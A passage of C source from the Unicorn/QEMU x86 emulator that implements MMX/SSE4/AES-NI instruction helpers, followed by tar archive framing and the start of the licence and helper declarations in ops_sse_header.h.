d->MMX_S(1) = float32_sub(d->MMX_S(1), s->MMX_S(1), &env->mmx_status); } void helper_pfsubr(CPUX86State *env, MMXReg *d, MMXReg *s) { d->MMX_S(0) = float32_sub(s->MMX_S(0), d->MMX_S(0), &env->mmx_status); d->MMX_S(1) = float32_sub(s->MMX_S(1), d->MMX_S(1), &env->mmx_status); } void helper_pswapd(CPUX86State *env, MMXReg *d, MMXReg *s) { MMXReg r; r.MMX_L(0) = s->MMX_L(1); r.MMX_L(1) = s->MMX_L(0); *d = r; } #endif /* SSSE3 op helpers */ void glue(helper_pshufb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg r; for (i = 0; i < (8 << SHIFT); i++) { r.B(i) = (s->B(i) & 0x80) ? 0 : (d->B(s->B(i) & ((8 << SHIFT) - 1))); } *d = r; } void glue(helper_phaddw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->W(0) = (int16_t)d->W(0) + (int16_t)d->W(1); d->W(1) = (int16_t)d->W(2) + (int16_t)d->W(3); XMM_ONLY(d->W(2) = (int16_t)d->W(4) + (int16_t)d->W(5)); XMM_ONLY(d->W(3) = (int16_t)d->W(6) + (int16_t)d->W(7)); d->W((2 << SHIFT) + 0) = (int16_t)s->W(0) + (int16_t)s->W(1); d->W((2 << SHIFT) + 1) = (int16_t)s->W(2) + (int16_t)s->W(3); XMM_ONLY(d->W(6) = (int16_t)s->W(4) + (int16_t)s->W(5)); XMM_ONLY(d->W(7) = (int16_t)s->W(6) + (int16_t)s->W(7)); } void glue(helper_phaddd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->L(0) = (int32_t)d->L(0) + (int32_t)d->L(1); XMM_ONLY(d->L(1) = (int32_t)d->L(2) + (int32_t)d->L(3)); d->L((1 << SHIFT) + 0) = (int32_t)s->L(0) + (int32_t)s->L(1); XMM_ONLY(d->L(3) = (int32_t)s->L(2) + (int32_t)s->L(3)); } void glue(helper_phaddsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->W(0) = satsw((int16_t)d->W(0) + (int16_t)d->W(1)); d->W(1) = satsw((int16_t)d->W(2) + (int16_t)d->W(3)); XMM_ONLY(d->W(2) = satsw((int16_t)d->W(4) + (int16_t)d->W(5))); XMM_ONLY(d->W(3) = satsw((int16_t)d->W(6) + (int16_t)d->W(7))); d->W((2 << SHIFT) + 0) = satsw((int16_t)s->W(0) + (int16_t)s->W(1)); d->W((2 << SHIFT) + 1) = satsw((int16_t)s->W(2) + (int16_t)s->W(3)); XMM_ONLY(d->W(6) = satsw((int16_t)s->W(4) + (int16_t)s->W(5))); XMM_ONLY(d->W(7) = satsw((int16_t)s->W(6) + (int16_t)s->W(7))); } void glue(helper_pmaddubsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->W(0) = satsw((int8_t)s->B(0) * (uint8_t)d->B(0) + (int8_t)s->B(1) * (uint8_t)d->B(1)); d->W(1) = satsw((int8_t)s->B(2) * (uint8_t)d->B(2) + (int8_t)s->B(3) * (uint8_t)d->B(3)); d->W(2) = satsw((int8_t)s->B(4) * (uint8_t)d->B(4) + (int8_t)s->B(5) * (uint8_t)d->B(5)); d->W(3) = satsw((int8_t)s->B(6) * (uint8_t)d->B(6) + (int8_t)s->B(7) * (uint8_t)d->B(7)); #if SHIFT == 1 d->W(4) = satsw((int8_t)s->B(8) * (uint8_t)d->B(8) + (int8_t)s->B(9) * (uint8_t)d->B(9)); d->W(5) = satsw((int8_t)s->B(10) * (uint8_t)d->B(10) + (int8_t)s->B(11) * (uint8_t)d->B(11)); d->W(6) = satsw((int8_t)s->B(12) * (uint8_t)d->B(12) + (int8_t)s->B(13) * (uint8_t)d->B(13)); d->W(7) = satsw((int8_t)s->B(14) * (uint8_t)d->B(14) + (int8_t)s->B(15) * (uint8_t)d->B(15)); #endif } void glue(helper_phsubw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->W(0) = (int16_t)d->W(0) - (int16_t)d->W(1); d->W(1) = (int16_t)d->W(2) - (int16_t)d->W(3); XMM_ONLY(d->W(2) = (int16_t)d->W(4) - (int16_t)d->W(5)); XMM_ONLY(d->W(3) = (int16_t)d->W(6) - (int16_t)d->W(7)); d->W((2 << SHIFT) + 0) = (int16_t)s->W(0) - (int16_t)s->W(1); d->W((2 << SHIFT) + 1) = (int16_t)s->W(2) - (int16_t)s->W(3); XMM_ONLY(d->W(6) = (int16_t)s->W(4) - (int16_t)s->W(5)); XMM_ONLY(d->W(7) = (int16_t)s->W(6) - (int16_t)s->W(7)); } void glue(helper_phsubd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->L(0) = (int32_t)d->L(0) - (int32_t)d->L(1); XMM_ONLY(d->L(1) = (int32_t)d->L(2) - (int32_t)d->L(3)); d->L((1 << SHIFT) + 0) = (int32_t)s->L(0) - (int32_t)s->L(1); XMM_ONLY(d->L(3) = (int32_t)s->L(2) - (int32_t)s->L(3)); } void glue(helper_phsubsw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->W(0) = satsw((int16_t)d->W(0) - (int16_t)d->W(1)); d->W(1) = satsw((int16_t)d->W(2) - (int16_t)d->W(3)); XMM_ONLY(d->W(2) = satsw((int16_t)d->W(4) - (int16_t)d->W(5))); XMM_ONLY(d->W(3) = satsw((int16_t)d->W(6) - (int16_t)d->W(7))); d->W((2 << SHIFT) + 0) = satsw((int16_t)s->W(0) - (int16_t)s->W(1)); d->W((2 << SHIFT) + 1) = satsw((int16_t)s->W(2) - (int16_t)s->W(3)); XMM_ONLY(d->W(6) = satsw((int16_t)s->W(4) - (int16_t)s->W(5))); XMM_ONLY(d->W(7) = satsw((int16_t)s->W(6) - (int16_t)s->W(7))); } #define FABSB(_, x) (x > INT8_MAX ? -(int8_t)x : x) #define FABSW(_, x) (x > INT16_MAX ? -(int16_t)x : x) #define FABSL(_, x) (x > INT32_MAX ? -(int32_t)x : x) SSE_HELPER_B(helper_pabsb, FABSB) SSE_HELPER_W(helper_pabsw, FABSW) SSE_HELPER_L(helper_pabsd, FABSL) #define FMULHRSW(d, s) (((int16_t) d * (int16_t)s + 0x4000) >> 15) SSE_HELPER_W(helper_pmulhrsw, FMULHRSW) #define FSIGNB(d, s) (s <= INT8_MAX ? s ? d : 0 : -(int8_t)d) #define FSIGNW(d, s) (s <= INT16_MAX ? s ? d : 0 : -(int16_t)d) #define FSIGNL(d, s) (s <= INT32_MAX ? s ? d : 0 : -(int32_t)d) SSE_HELPER_B(helper_psignb, FSIGNB) SSE_HELPER_W(helper_psignw, FSIGNW) SSE_HELPER_L(helper_psignd, FSIGNL) void glue(helper_palignr, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, int32_t shift) { Reg r; /* XXX could be checked during translation */ if (shift >= (16 << SHIFT)) { r.Q(0) = 0; XMM_ONLY(r.Q(1) = 0); } else { shift <<= 3; #define SHR(v, i) (i < 64 && i > -64 ? i > 0 ? v >> (i) : (v << -(i)) : 0) #if SHIFT == 0 r.Q(0) = SHR(s->Q(0), shift - 0) | SHR(d->Q(0), shift - 64); #else r.Q(0) = SHR(s->Q(0), shift - 0) | SHR(s->Q(1), shift - 64) | SHR(d->Q(0), shift - 128) | SHR(d->Q(1), shift - 192); r.Q(1) = SHR(s->Q(0), shift + 64) | SHR(s->Q(1), shift - 0) | SHR(d->Q(0), shift - 64) | SHR(d->Q(1), shift - 128); #endif #undef SHR } *d = r; } #define XMM0 (env->xmm_regs[0]) #if SHIFT == 1 #define SSE_HELPER_V(name, elem, num, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ d->elem(0) = F(d->elem(0), s->elem(0), XMM0.elem(0)); \ d->elem(1) = F(d->elem(1), s->elem(1), XMM0.elem(1)); \ if (num > 2) { \ d->elem(2) = F(d->elem(2), s->elem(2), XMM0.elem(2)); \ d->elem(3) = F(d->elem(3), s->elem(3), XMM0.elem(3)); \ if (num > 4) { \ d->elem(4) = F(d->elem(4), s->elem(4), XMM0.elem(4)); \ d->elem(5) = F(d->elem(5), s->elem(5), XMM0.elem(5)); \ d->elem(6) = F(d->elem(6), s->elem(6), XMM0.elem(6)); \ d->elem(7) = F(d->elem(7), s->elem(7), XMM0.elem(7)); \ if (num > 8) { \ d->elem(8) = F(d->elem(8), s->elem(8), XMM0.elem(8)); \ d->elem(9) = F(d->elem(9), s->elem(9), XMM0.elem(9)); \ d->elem(10) = F(d->elem(10), s->elem(10), XMM0.elem(10)); \ d->elem(11) = F(d->elem(11), s->elem(11), XMM0.elem(11)); \ d->elem(12) = F(d->elem(12), s->elem(12), XMM0.elem(12)); \ d->elem(13) = F(d->elem(13), s->elem(13), XMM0.elem(13)); \ d->elem(14) = F(d->elem(14), s->elem(14), XMM0.elem(14)); \ d->elem(15) = F(d->elem(15), s->elem(15), XMM0.elem(15)); \ } \ } \ } \ } #define SSE_HELPER_I(name, elem, num, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t imm) \ { \ d->elem(0) = F(d->elem(0), s->elem(0), ((imm >> 0) & 1)); \ d->elem(1) = F(d->elem(1), s->elem(1), ((imm >> 1) & 1)); \ if (num > 2) { \ d->elem(2) = F(d->elem(2), s->elem(2), ((imm >> 2) & 1)); \ d->elem(3) = F(d->elem(3), s->elem(3), ((imm >> 3) & 1)); \ if (num > 4) { \ d->elem(4) = F(d->elem(4), s->elem(4), ((imm >> 4) & 1)); \ d->elem(5) = F(d->elem(5), s->elem(5), ((imm >> 5) & 1)); \ d->elem(6) = F(d->elem(6), s->elem(6), ((imm >> 6) & 1)); \ d->elem(7) = F(d->elem(7), s->elem(7), ((imm >> 7) & 1)); \ if (num > 8) { \ d->elem(8) = F(d->elem(8), s->elem(8), ((imm >> 8) & 1)); \ d->elem(9) = F(d->elem(9), s->elem(9), ((imm >> 9) & 1)); \ d->elem(10) = F(d->elem(10), s->elem(10), \ ((imm >> 10) & 1)); \ d->elem(11) = F(d->elem(11), s->elem(11), \ ((imm >> 11) & 1)); \ d->elem(12) = F(d->elem(12), s->elem(12), \ ((imm >> 12) & 1)); \ d->elem(13) = F(d->elem(13), s->elem(13), \ ((imm >> 13) & 1)); \ d->elem(14) = F(d->elem(14), s->elem(14), \ ((imm >> 14) & 1)); \ d->elem(15) = F(d->elem(15), s->elem(15), \ ((imm >> 15) & 1)); \ } \ } \ } \ } /* SSE4.1 op helpers */ #define FBLENDVB(d, s, m) ((m & 0x80) ? s : d) #define FBLENDVPS(d, s, m) ((m & 0x80000000) ? s : d) #define FBLENDVPD(d, s, m) ((m & 0x8000000000000000LL) ? s : d) SSE_HELPER_V(helper_pblendvb, B, 16, FBLENDVB) SSE_HELPER_V(helper_blendvps, L, 4, FBLENDVPS) SSE_HELPER_V(helper_blendvpd, Q, 2, FBLENDVPD) void glue(helper_ptest, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { uint64_t zf = (s->Q(0) & d->Q(0)) | (s->Q(1) & d->Q(1)); uint64_t cf = (s->Q(0) & ~d->Q(0)) | (s->Q(1) & ~d->Q(1)); CC_SRC = (zf ? 0 : CC_Z) | (cf ? 0 : CC_C); } #define SSE_HELPER_F(name, elem, num, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ if (num > 2) { \ if (num > 4) { \ d->elem(7) = F(7); \ d->elem(6) = F(6); \ d->elem(5) = F(5); \ d->elem(4) = F(4); \ } \ d->elem(3) = F(3); \ d->elem(2) = F(2); \ } \ d->elem(1) = F(1); \ d->elem(0) = F(0); \ } SSE_HELPER_F(helper_pmovsxbw, W, 8, (int8_t) s->B) SSE_HELPER_F(helper_pmovsxbd, L, 4, (int8_t) s->B) SSE_HELPER_F(helper_pmovsxbq, Q, 2, (int8_t) s->B) SSE_HELPER_F(helper_pmovsxwd, L, 4, (int16_t) s->W) SSE_HELPER_F(helper_pmovsxwq, Q, 2, (int16_t) s->W) SSE_HELPER_F(helper_pmovsxdq, Q, 2, (int32_t) s->L) SSE_HELPER_F(helper_pmovzxbw, W, 8, s->B) SSE_HELPER_F(helper_pmovzxbd, L, 4, s->B) SSE_HELPER_F(helper_pmovzxbq, Q, 2, s->B) SSE_HELPER_F(helper_pmovzxwd, L, 4, s->W) SSE_HELPER_F(helper_pmovzxwq, Q, 2, s->W) SSE_HELPER_F(helper_pmovzxdq, Q, 2, s->L) void glue(helper_pmuldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->Q(0) = (int64_t)(int32_t) d->L(0) * (int32_t) s->L(0); d->Q(1) = (int64_t)(int32_t) d->L(2) * (int32_t) s->L(2); } #define FCMPEQQ(d, s) (d == s ? -1 : 0) SSE_HELPER_Q(helper_pcmpeqq, FCMPEQQ) void glue(helper_packusdw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { Reg r; r.W(0) = satuw((int32_t) d->L(0)); r.W(1) = satuw((int32_t) d->L(1)); r.W(2) = satuw((int32_t) d->L(2)); r.W(3) = satuw((int32_t) d->L(3)); r.W(4) = satuw((int32_t) s->L(0)); r.W(5) = satuw((int32_t) s->L(1)); r.W(6) = satuw((int32_t) s->L(2)); r.W(7) = satuw((int32_t) s->L(3)); *d = r; } #define FMINSB(d, s) MIN((int8_t)d, (int8_t)s) #define FMINSD(d, s) MIN((int32_t)d, (int32_t)s) #define FMAXSB(d, s) MAX((int8_t)d, (int8_t)s) #define FMAXSD(d, s) MAX((int32_t)d, (int32_t)s) SSE_HELPER_B(helper_pminsb, FMINSB) SSE_HELPER_L(helper_pminsd, FMINSD) SSE_HELPER_W(helper_pminuw, MIN) SSE_HELPER_L(helper_pminud, MIN) SSE_HELPER_B(helper_pmaxsb, FMAXSB) SSE_HELPER_L(helper_pmaxsd, FMAXSD) SSE_HELPER_W(helper_pmaxuw, MAX) SSE_HELPER_L(helper_pmaxud, MAX) #define FMULLD(d, s) ((int32_t)d * (int32_t)s) SSE_HELPER_L(helper_pmulld, FMULLD) void glue(helper_phminposuw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int idx = 0; if (s->W(1) < s->W(idx)) { idx = 1; } if (s->W(2) < s->W(idx)) { idx = 2; } if (s->W(3) < s->W(idx)) { idx = 3; } if (s->W(4) < s->W(idx)) { idx = 4; } if (s->W(5) < s->W(idx)) { idx = 5; } if (s->W(6) < s->W(idx)) { idx = 6; } if (s->W(7) < s->W(idx)) { idx = 7; } d->W(0) = s->W(idx); d->W(1) = idx; d->L(1) = 0; d->Q(1) = 0; } void glue(helper_roundps, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mode) { signed char prev_rounding_mode; prev_rounding_mode = env->sse_status.float_rounding_mode; if (!(mode & (1 << 2))) { switch (mode & 3) { case 0: set_float_rounding_mode(float_round_nearest_even, &env->sse_status); break; case 1: set_float_rounding_mode(float_round_down, &env->sse_status); break; case 2: set_float_rounding_mode(float_round_up, &env->sse_status); break; case 3: set_float_rounding_mode(float_round_to_zero, &env->sse_status); break; } } d->ZMM_S(0) = float32_round_to_int(s->ZMM_S(0), &env->sse_status); d->ZMM_S(1) = float32_round_to_int(s->ZMM_S(1), &env->sse_status); d->ZMM_S(2) = float32_round_to_int(s->ZMM_S(2), &env->sse_status); d->ZMM_S(3) = float32_round_to_int(s->ZMM_S(3), &env->sse_status); #if 0 /* TODO */ if (mode & (1 << 3)) { set_float_exception_flags(get_float_exception_flags(&env->sse_status) & ~float_flag_inexact, &env->sse_status); } #endif env->sse_status.float_rounding_mode = prev_rounding_mode; } void glue(helper_roundpd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mode) { signed char prev_rounding_mode; prev_rounding_mode = env->sse_status.float_rounding_mode; if (!(mode & (1 << 2))) { switch (mode & 3) { case 0: set_float_rounding_mode(float_round_nearest_even, &env->sse_status); break; case 1: set_float_rounding_mode(float_round_down, &env->sse_status); break; case 2: set_float_rounding_mode(float_round_up, &env->sse_status); break; case 3: set_float_rounding_mode(float_round_to_zero, &env->sse_status); break; } } d->ZMM_D(0) = float64_round_to_int(s->ZMM_D(0), &env->sse_status); d->ZMM_D(1) = float64_round_to_int(s->ZMM_D(1), &env->sse_status); #if 0 /* TODO */ if (mode & (1 << 3)) { set_float_exception_flags(get_float_exception_flags(&env->sse_status) & ~float_flag_inexact, &env->sse_status); } #endif env->sse_status.float_rounding_mode = prev_rounding_mode; } void glue(helper_roundss, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mode) { signed char prev_rounding_mode; prev_rounding_mode = env->sse_status.float_rounding_mode; if (!(mode & (1 << 2))) { switch (mode & 3) { case 0: set_float_rounding_mode(float_round_nearest_even, &env->sse_status); break; case 1: set_float_rounding_mode(float_round_down, &env->sse_status); break; case 2: set_float_rounding_mode(float_round_up, &env->sse_status); break; case 3: set_float_rounding_mode(float_round_to_zero, &env->sse_status); break; } } d->ZMM_S(0) = float32_round_to_int(s->ZMM_S(0), &env->sse_status); #if 0 /* TODO */ if (mode & (1 << 3)) { set_float_exception_flags(get_float_exception_flags(&env->sse_status) & ~float_flag_inexact, &env->sse_status); } #endif env->sse_status.float_rounding_mode = prev_rounding_mode; } void glue(helper_roundsd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mode) { signed char prev_rounding_mode; prev_rounding_mode = env->sse_status.float_rounding_mode; if (!(mode & (1 << 2))) { switch (mode & 3) { case 0: set_float_rounding_mode(float_round_nearest_even, &env->sse_status); break; case 1: set_float_rounding_mode(float_round_down, &env->sse_status); break; case 2: set_float_rounding_mode(float_round_up, &env->sse_status); break; case 3: set_float_rounding_mode(float_round_to_zero, &env->sse_status); break; } } d->ZMM_D(0) = float64_round_to_int(s->ZMM_D(0), &env->sse_status); #if 0 /* TODO */ if (mode & (1 << 3)) { set_float_exception_flags(get_float_exception_flags(&env->sse_status) & ~float_flag_inexact, &env->sse_status); } #endif env->sse_status.float_rounding_mode = prev_rounding_mode; } #define FBLENDP(d, s, m) (m ? s : d) SSE_HELPER_I(helper_blendps, L, 4, FBLENDP) SSE_HELPER_I(helper_blendpd, Q, 2, FBLENDP) SSE_HELPER_I(helper_pblendw, W, 8, FBLENDP) void glue(helper_dpps, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mask) { float32 iresult = float32_zero; if (mask & (1 << 4)) { iresult = float32_add(iresult, float32_mul(d->ZMM_S(0), s->ZMM_S(0), &env->sse_status), &env->sse_status); } if (mask & (1 << 5)) { iresult = float32_add(iresult, float32_mul(d->ZMM_S(1), s->ZMM_S(1), &env->sse_status), &env->sse_status); } if (mask & (1 << 6)) { iresult = float32_add(iresult, float32_mul(d->ZMM_S(2), s->ZMM_S(2), &env->sse_status), &env->sse_status); } if (mask & (1 << 7)) { iresult = float32_add(iresult, float32_mul(d->ZMM_S(3), s->ZMM_S(3), &env->sse_status), &env->sse_status); } d->ZMM_S(0) = (mask & (1 << 0)) ? iresult : float32_zero; d->ZMM_S(1) = (mask & (1 << 1)) ? iresult : float32_zero; d->ZMM_S(2) = (mask & (1 << 2)) ? iresult : float32_zero; d->ZMM_S(3) = (mask & (1 << 3)) ? iresult : float32_zero; } void glue(helper_dppd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t mask) { float64 iresult = float64_zero; if (mask & (1 << 4)) { iresult = float64_add(iresult, float64_mul(d->ZMM_D(0), s->ZMM_D(0), &env->sse_status), &env->sse_status); } if (mask & (1 << 5)) { iresult = float64_add(iresult, float64_mul(d->ZMM_D(1), s->ZMM_D(1), &env->sse_status), &env->sse_status); } d->ZMM_D(0) = (mask & (1 << 0)) ? iresult : float64_zero; d->ZMM_D(1) = (mask & (1 << 1)) ? iresult : float64_zero; } void glue(helper_mpsadbw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t offset) { int s0 = (offset & 3) << 2; int d0 = (offset & 4) << 0; int i; Reg r; for (i = 0; i < 8; i++, d0++) { r.W(i) = 0; r.W(i) += abs1(d->B(d0 + 0) - s->B(s0 + 0)); r.W(i) += abs1(d->B(d0 + 1) - s->B(s0 + 1)); r.W(i) += abs1(d->B(d0 + 2) - s->B(s0 + 2)); r.W(i) += abs1(d->B(d0 + 3) - s->B(s0 + 3)); } *d = r; } /* SSE4.2 op helpers */ #define FCMPGTQ(d, s) ((int64_t)d > (int64_t)s ? -1 : 0) SSE_HELPER_Q(helper_pcmpgtq, FCMPGTQ) static inline int pcmp_elen(CPUX86State *env, int reg, uint32_t ctrl) { int val; /* Presence of REX.W is indicated by a bit higher than 7 set */ if (ctrl >> 8) { val = abs1((int64_t)env->regs[reg]); } else { val = abs1((int32_t)env->regs[reg]); } if (ctrl & 1) { if (val > 8) { return 8; } } else { if (val > 16) { return 16; } } return val; } static inline int pcmp_ilen(Reg *r, uint8_t ctrl) { int val = 0; if (ctrl & 1) { while (val < 8 && r->W(val)) { val++; } } else { while (val < 16 && r->B(val)) { val++; } } return val; } static inline int pcmp_val(Reg *r, uint8_t ctrl, int i) { switch ((ctrl >> 0) & 3) { case 0: return r->B(i); case 1: return r->W(i); case 2: return (int8_t)r->B(i); case 3: default: return (int16_t)r->W(i); } } static inline unsigned pcmpxstrx(CPUX86State *env, Reg *d, Reg *s, int8_t ctrl, int valids, int validd) { unsigned int res = 0; int v; int j, i; int upper = (ctrl & 1) ? 7 : 15; valids--; validd--; CC_SRC = (valids < upper ? CC_Z : 0) | (validd < upper ? CC_S : 0); switch ((ctrl >> 2) & 3) { case 0: for (j = valids; j >= 0; j--) { res <<= 1; v = pcmp_val(s, ctrl, j); for (i = validd; i >= 0; i--) { res |= (v == pcmp_val(d, ctrl, i)); } } break; case 1: for (j = valids; j >= 0; j--) { res <<= 1; v = pcmp_val(s, ctrl, j); for (i = ((validd - 1) | 1); i >= 0; i -= 2) { res |= (pcmp_val(d, ctrl, i - 0) >= v && pcmp_val(d, ctrl, i - 1) <= v); } } break; case 2: res = (1 << (upper - MAX(valids, validd))) - 1; res <<= MAX(valids, validd) - MIN(valids, validd); for (i = MIN(valids, validd); i >= 0; i--) { res <<= 1; v = pcmp_val(s, ctrl, i); res |= (v == pcmp_val(d, ctrl, i)); } break; case 3: if (validd == -1) { res = (2 << upper) - 1; break; } for (j = valids - validd; j >= 0; j--) { res <<= 1; v = 1; for (i = validd; i >= 0; i--) { v &= (pcmp_val(s, ctrl, i + j) == pcmp_val(d, ctrl, i)); } res |= v; } break; } switch ((ctrl >> 4) & 3) { case 1: res ^= (2 << upper) - 1; break; case 3: res ^= (1 << (valids + 1)) - 1; break; } if (res) { CC_SRC |= CC_C; } if (res & 1) { CC_SRC |= CC_O; } return res; } void glue(helper_pcmpestri, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { unsigned int res = pcmpxstrx(env, d, s, ctrl, pcmp_elen(env, R_EDX, ctrl), pcmp_elen(env, R_EAX, ctrl)); if (res) { env->regs[R_ECX] = (ctrl & (1 << 6)) ? 31 - clz32(res) : ctz32(res); } else { env->regs[R_ECX] = 16 >> (ctrl & (1 << 0)); } } void glue(helper_pcmpestrm, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { int i; unsigned int res = pcmpxstrx(env, d, s, ctrl, pcmp_elen(env, R_EDX, ctrl), pcmp_elen(env, R_EAX, ctrl)); if ((ctrl >> 6) & 1) { if (ctrl & 1) { for (i = 0; i < 8; i++, res >>= 1) { env->xmm_regs[0].W(i) = (res & 1) ? ~0 : 0; } } else { for (i = 0; i < 16; i++, res >>= 1) { env->xmm_regs[0].B(i) = (res & 1) ? ~0 : 0; } } } else { env->xmm_regs[0].Q(1) = 0; env->xmm_regs[0].Q(0) = res; } } void glue(helper_pcmpistri, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { unsigned int res = pcmpxstrx(env, d, s, ctrl, pcmp_ilen(s, ctrl), pcmp_ilen(d, ctrl)); if (res) { env->regs[R_ECX] = (ctrl & (1 << 6)) ? 31 - clz32(res) : ctz32(res); } else { env->regs[R_ECX] = 16 >> (ctrl & (1 << 0)); } } void glue(helper_pcmpistrm, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { int i; unsigned int res = pcmpxstrx(env, d, s, ctrl, pcmp_ilen(s, ctrl), pcmp_ilen(d, ctrl)); if ((ctrl >> 6) & 1) { if (ctrl & 1) { for (i = 0; i < 8; i++, res >>= 1) { env->xmm_regs[0].W(i) = (res & 1) ? ~0 : 0; } } else { for (i = 0; i < 16; i++, res >>= 1) { env->xmm_regs[0].B(i) = (res & 1) ? ~0 : 0; } } } else { env->xmm_regs[0].Q(1) = 0; env->xmm_regs[0].Q(0) = res; } } #define CRCPOLY 0x1edc6f41 #define CRCPOLY_BITREV 0x82f63b78 target_ulong helper_crc32(uint32_t crc1, target_ulong msg, uint32_t len) { target_ulong crc = (msg & ((target_ulong) -1 >> (TARGET_LONG_BITS - len))) ^ crc1; while (len--) { crc = (crc >> 1) ^ ((crc & 1) ? CRCPOLY_BITREV : 0); } return crc; } void glue(helper_pclmulqdq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { uint64_t ah, al, b, resh, resl; ah = 0; al = d->Q((ctrl & 1) != 0); b = s->Q((ctrl & 16) != 0); resh = resl = 0; while (b) { if (b & 1) { resl ^= al; resh ^= ah; } ah = (ah << 1) | (al >> 63); al <<= 1; b >>= 1; } d->Q(0) = resl; d->Q(1) = resh; } void glue(helper_aesdec, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg st = *d; Reg rk = *s; for (i = 0 ; i < 4 ; i++) { d->L(i) = rk.L(i) ^ bswap32(AES_Td0[st.B(AES_ishifts[4*i+0])] ^ AES_Td1[st.B(AES_ishifts[4*i+1])] ^ AES_Td2[st.B(AES_ishifts[4*i+2])] ^ AES_Td3[st.B(AES_ishifts[4*i+3])]); } } void glue(helper_aesdeclast, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg st = *d; Reg rk = *s; for (i = 0; i < 16; i++) { d->B(i) = rk.B(i) ^ (AES_isbox[st.B(AES_ishifts[i])]); } } void glue(helper_aesenc, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg st = *d; Reg rk = *s; for (i = 0 ; i < 4 ; i++) { d->L(i) = rk.L(i) ^ bswap32(AES_Te0[st.B(AES_shifts[4*i+0])] ^ AES_Te1[st.B(AES_shifts[4*i+1])] ^ AES_Te2[st.B(AES_shifts[4*i+2])] ^ AES_Te3[st.B(AES_shifts[4*i+3])]); } } void glue(helper_aesenclast, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg st = *d; Reg rk = *s; for (i = 0; i < 16; i++) { d->B(i) = rk.B(i) ^ (AES_sbox[st.B(AES_shifts[i])]); } } void glue(helper_aesimc, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; Reg tmp = *s; for (i = 0 ; i < 4 ; i++) { d->L(i) = bswap32(AES_imc[tmp.B(4*i+0)][0] ^ AES_imc[tmp.B(4*i+1)][1] ^ AES_imc[tmp.B(4*i+2)][2] ^ AES_imc[tmp.B(4*i+3)][3]); } } void glue(helper_aeskeygenassist, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, uint32_t ctrl) { int i; Reg tmp = *s; for (i = 0 ; i < 4 ; i++) { d->B(i) = AES_sbox[tmp.B(i + 4)]; d->B(i + 8) = AES_sbox[tmp.B(i + 12)]; } d->L(1) = (d->L(0) << 24 | d->L(0) >> 8) ^ ctrl; d->L(3) = (d->L(2) << 24 | d->L(2) >> 8) ^ ctrl; } #endif #undef SHIFT #undef XMM_ONLY #undef Reg #undef B #undef W #undef L #undef Q #undef SUFFIX �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/ops_sse_header.h�����������������������������������������������������0000664�0000000�0000000�00000031720�14675241067�0021271�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI support * * Copyright (c) 2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #if SHIFT == 0 #define Reg MMXReg #define SUFFIX _mmx #else #define Reg ZMMReg #define SUFFIX _xmm #endif #define dh_alias_Reg ptr #define dh_alias_ZMMReg ptr #define dh_alias_MMXReg ptr #define dh_ctype_Reg Reg * #define dh_ctype_ZMMReg ZMMReg * #define dh_ctype_MMXReg MMXReg * #define dh_is_signed_Reg dh_is_signed_ptr #define dh_is_signed_ZMMReg dh_is_signed_ptr #define dh_is_signed_MMXReg dh_is_signed_ptr DEF_HELPER_3(glue(psrlw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psraw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psllw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psrld, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psrad, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pslld, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psrlq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psllq, SUFFIX), 